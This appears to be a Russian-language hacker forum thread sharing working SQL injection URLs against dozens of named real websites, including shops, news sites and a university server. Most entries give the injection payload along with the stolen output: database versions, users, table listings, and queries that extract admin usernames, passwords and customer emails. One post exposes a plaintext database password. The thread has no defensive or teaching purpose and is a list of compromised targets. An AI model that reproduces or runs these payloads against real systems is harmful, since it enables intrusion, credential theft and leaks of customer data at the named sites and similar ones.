SQL Инъекции

www.tamaris.de/home/collection/shoes/l/1/detail/1 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18--9/c/1.html?request=1

 

http://www.mortarinvestments.eu/vehicle.php?id=-171+union+select+1,2,3,4,concat(user(),version(),database(),@@version_compile_os),6,7,8

http://www.emantravel.com/article.php?id=-77+union+select+concat_ws(0x3a,user(),version(),database(),@@version_compile_os),2

http://www.mtg.es/en/diseno_todostallas.php?enid=-8+union+select+1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41

http://www.norica.es/index.php?opt=2&id=-323+union+select+1,2,3,4,5,concat(user_login,char(58),user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+test.wp_users+limit+0,1--
+phpinfo
http://www.norica.es/phpinfo.php

 

www.websiteicons.net/index.php?id=-6 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13--&p=icons

www.companycoltd.com/company_coltd.php?company_id=f620555555555 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13--

www.berlin.de/tourismus/unterkunft/pensionen/mirnet/hotel/buchung/anfrage.php3?objektnr=38 union select version(),2,3,4,5,6,7--&p=1&s=de&an=&ab=

 

для гурманов алкогольной продукции....

Code:

http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--

version : 5.0.67-log
user : [email protected]
database : u93285
os : unknown-freebsd6.2

Code:

http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),login,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+bw_admin--

 

честно сказать, не знаю, можно-ли назвать это инъекцией или нет, но вот:
http://www.evidenceofhumanity.org/story.php?id=9'
в результате имеем:

Code:

[dbserver] => localhost [dbusername] => evidence_admin [dbpassword] => 53889160Cody [dbdatabase] => evidence_evidence [dbProvider] => MySQL

думаю, это самое интересное

 

Code:

http://www.vestidos.ru/pages/catalog.php?cid=-97+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17+--

version : 5.0.24-standard
user : vestidos@localhost
database : db_vestidos
os : pc-linux-gnu

 

http://www.konqi.com/en/read_article.asp?articleid=-69+union+select+1,password,3,4,5,6,7,8,9,10+from+user

ms_access

 

Сайт: http://www.gourmandisedesserts.com
ТИЦ: 0
PR: 3
Пример запроса:

Code:

http://www.gourmandisedesserts.com/class.php?id=-65+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),null,5,null,null,null,9,10,11,12,null,14+from+information_schema.tables--+

version - 5.0.67.d7-ourdelta-log
user - [email protected]
database - gourmandise
os - unknown-linux-gnu
tables:

Code:

CHARACTER_SETS,   
CLIENT_STATISTICS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
INNODB_BUFFER_POOL_CONTENT,   
INDEX_STATISTICS,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TABLE_STATISTICS,   
TRIGGERS,   
USER_PRIVILEGES,   
USER_STATISTICS,   
VIEWS,   
classes

==========================================

Сайт: http://www.doors007.ru
ТИЦ: 10
PR: 1
Пример запроса:

Code:

http://www.doors007.ru/item2.php?id=-252+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--+

version - 5.0.89-Max-log
user - [email protected]
database - k0038kze_stroyka
os - unknown-linux-gnu
tables:

Code:

CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
doc,   
doc_group,   
docs_mode,   
doors007_links,   
faq,   
folder,   
folder_optional_parameters,   
fo

==========================================

Сайт: http://www.mosadharavkook.com
ТИЦ: ?
PR: 2
Пример запроса:

Code:

http://www.mosadharavkook.com/store/item2.php?id=-408+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+

version - 4.1.22-standard
user - mravkook_yoni@localhost
database - mravkook_catalog
os - pc-linux-gnu

==========================================

Сайт: http://www.northcitymarine.com.au
ТИЦ: 0
PR: 0
Пример запроса:

Code:

http://www.northcitymarine.com.au/item2.php?id=-15+union+select+1,2,3,4,5,6,7,8,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),10,11,12,13,14,15,null,17--+

version - 4.0.27-standard
user - [email protected]
database - ZR12600_ncmsite
os - pc-linux-gnu

 

5.0.90-community

Code:

http://chaithanya.org/php/readmore.php?id=-5+union+select+1,version(),group_concat(0x0b,column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x757365726C6F67696E+--

table: userlogin::userid,username,userpassword,usertype,userstatus

and

Code:

http://chaithanya.org/php/readmore.php?id=-5+union+select+1,2,group_concat(0x0b,username,0x3a,userpassword),4,5,6,7,8,9+from+userlogin+--

 

пр2

Code:

http://davigames.com/games.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

пр2 тиц10

Code:

http://gsm-sprut.com/n.php?nid=-1+union+select+1,2,3,4,5,6--

 

http://www.hdmi.hr/stc2007/index.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13+from+admin--

http://www.oceanmore.hr/knjiga.php?id_knjiga=-62+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8

 

Сайт: http://www.netcurtainsdirect.com
ТИЦ: 10
PR: 2
Примеры запросов:

Code:

http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88+from+information_schema.tables--+  

http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,2,3,group_concat(0x0b,column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88+from+information_schema.columns+where+table_name='phpbb_users'--+

version - 5.0.67
user - netcurtains@localhost
database - netcurtainsdirect_com_-_cnets
os - redhat-linux-gnu
tables:

Code:

CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
accessories,   
bargains,   
cafe,   
cart,   
customers,   
customers_optimal,   
defaults,   
delivery,   
deyron,   
email_list,   
faq,   
howhear,   
inspiration,   
invoice,   
linedvoile_panels,   
nets,   
optimal_errors,   
orderlines,   
orderlines_opt,   
orders,   
orders_opt,   
orders_web,   
other,   
payments,   
product_options,   
products,   
products2,   
strings,   
tablecloths,   
test_customers,   
test_orderlines,   
test_orders,   
test_payments,   
testimonials,   
tiebacks,   
typedesc,   
typedesc_old,   
voile,   
voilecurtains,   
voilepanels,   
phpbb_auth_access,   
phpbb_banlist,   
phpbb_categories,   
phpbb_config,   
phpbb_confirm,   
phpbb_disallow,   
phpbb_forum_prune,   
phpbb_forums,   
phpbb_groups,   
phpbb_posts,   
phpbb_posts_text,   
phpbb_privmsgs,   
phpbb_privmsgs_text,   
phpbb_ranks,   
phpbb_search_results,   
phpbb_search_wordlist,   
phpbb_search_wordmatch,   
phpbb_sessio

 

ЦЕНТР СТРАТЕГІЧНИХ ІНІЦІАТИВ

 

http://www.princesscruises.com.do/destinos/index.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(user,char(58),pass),1),1)+from+admin

http://sips.inesc-id.pt/projects.php?id=-15+union+select+1,version(),user(),database(),@@version_compile_os,6,7,8,9,10,11,12-- (PR-5)

http://www.universal.pt/main.php?id=-69+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60+from+_tusers+limit+0,1-- [PR-5]

 

Сайт: http://www.retromoderndesign.com
ТИЦ: 10
PR: 3
Пример запроса:

Code:

http://www.retromoderndesign.com/sold.php?id=-7+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,group_concat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables--+

version - 5.0.90-log
user - [email protected]
database - d1479
os - pc-linux-gnu
tables:

Code:

CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
retromoderndesign_artikel,   
retromoderndesign_artikel_betyg,   
retromoderndesign_conversi cm

==========================================


Сайт: http://www.malloves.com
ТИЦ: 0
PR: 3
Примеры запросов:

Code:

http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,username,0x3a,password),5,6,7,8,9,10,11,12+from+go_users--+

http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,email),5,6,7,8,9,10,11,12+from+go_email_list--+

version - 5.0.77
user - malloves@localhost
database - malloves
os - redhat-linux-gnu
tables:

Code:

CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
CoverPhotos,   
Inventory,   
Materials,   
go_access_levels,   
go_content,   
go_content_types,   
go_current_special_categorys,   
go_current_special_categorys2,
go_current_special_categorys3,   
go_current_specials,   
go_current_specials2,   
go_current_specials3,   
go_email_list,   
go_email_list_status,   
go_misc,   
go_modules,   
go_online_inquiries,   
go_press,   
go_press_categories,   
go_press_categories_join,   
go_testimonials,   
go_users

==========================================

Сайт: http://www.pony1997.com
ТИЦ: 0
PR: 2
Пример запроса:

Code:

http://www.pony1997.com/item2.php?id=4&tbl=catitems2&stl=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--

version - PostgreSQL 8.1.4 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
user - gt108043
database - gt108043
os - i386-portbld-freebsd6.1

==========================================

Сайт: http://www.listentoaudioproshop.com
ТИЦ: 0
PR: 0
Пример запроса:

Code:

http://www.listentoaudioproshop.com/item3.php?id=53+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,group_concat(0x0b,username,0x3a,password)+from+proshop_login--+

version - 5.0.67
user - tookd_kwan@localhost
database - tookd_kwan
os - pc-linux-gnu
tables:

Code:

CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
proshop_category,   
proshop_detail,   
proshop_filter,   
proshop_filteritem,   
proshop_headitem,   
proshop_login

==========================================

Сайт: http://www.concretorecs.com
ТИЦ: 0
PR: 3
Пример запроса:

Code:

http://www.concretorecs.com/store/item3.php?id=-2789+union+select+1,2,3,4,5,6,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),8,9--+

version - 4.1.22-standard-log
user - concreto_concret@localhost
database - concreto_concreto
os - pc-linux-gnu

==========================================

Сайт: http://www.newsnetwork-bd.com
ТИЦ: 0
PR: 3
Пример запроса:

Code:

http://www.newsnetwork-bd.com/UI/Public/Common.php?ID=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),+1,+70),+floor(rand(0)*2)))--+

version - 4.1.22-max-log
user - [email protected]
database - newsnet1
os - unknown-linux-gnu

 

http://www.festivaltv.ru/bratina/honor/index.php?id=-16+union+select+1,2,version()+--+
version: 5.0.45
filepriv=no;

 

http://rascunho.iol.pt/pagina.php?id=-5+union+select+1,concat_ws(user(),version(),database(),@@version_compile_os),3,4,5,6

PR=6

 

Code:

http://en.fondsk.ru/article.php?id=-2845+UNION+SELECT+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

User: [email protected]
Version: 5.0.67-log
Database: u32888

Google PR: 4

 

Pr 4

http://www.panlarchile2010.cl/espanol/pagina.php?id=-1+union+select+1,2,3,4,5,email,7,8,9,10,11,12,13,14+from+clientes+--+

Pr 5

http://www.taan.org.np/article1.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,Password,Name,12+from+tblAdmin


http://www.diariodemadryn.com/pagina.php?ID=-1+union+select+1,2,3,4,email,6,nombre,pass,9,10+from+lectores

Pr 5

http://www.copernico.ch/deutsch/pagina.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10

Version :4.1.22
User : copernico@localhost
Server :Apache/2.2.6 (Unix) PHP/5.2.10

 

Сайт: http://www.danceforfun.at
ТИЦ: 0
PR: 3
Пример запроса:

Code:

http://www.danceforfun.at/common.php?id=-3+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+

4.0.24_Debian-10sarge1
[email protected]
da000113_d4f
pc-linux-gnu

============================================

Сайт: http://sports.njau.edu.cn
ТИЦ: 0
PR: 5
Примеры запросов:

Code:

http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6--+  

http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,group_concat(0x0b,table_name),5,6+from+information_schema.tables--+

version - 5.1.25-rc-community
user - root@localhost
database - sports
os - Win32